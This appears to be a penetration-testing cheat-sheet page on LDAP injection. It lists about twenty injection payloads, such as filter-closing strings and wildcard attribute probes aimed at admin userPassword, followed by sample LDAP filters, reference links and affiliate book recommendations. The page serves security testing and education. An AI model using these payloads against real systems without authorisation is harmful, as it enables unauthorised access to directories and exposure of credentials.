LDAP Injection

*
*)(&
*))%00
)(cn=))\x00
*()|%26'
*()|&'
*(|(mail=*))
*(|(objectclass=*))
*)(uid=*))(|(uid=*
*/*
*|
/
//
//*
@*
|
admin*
admin*)((|userpassword=*)
admin*)((|userPassword=*)
x' or name()='username' or 'x'='y

SANS Penetration Testing | Understanding and Exploiting Web-based LDAP | SANS Institute

Complete Guide to LDAP Injection: Types, Examples, and PreventionBright Security

(cn=steve)

# Search for anyone with a name that start with "s"

(cn=s*)

# Search for anyone with a name that starts with "s" or "t"

(|(cn=s*)(cn=t*))

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

The Web Application Hacker’s Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more
Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.

PreviousNoSQL injection NextXSS

Last updated 2 months ago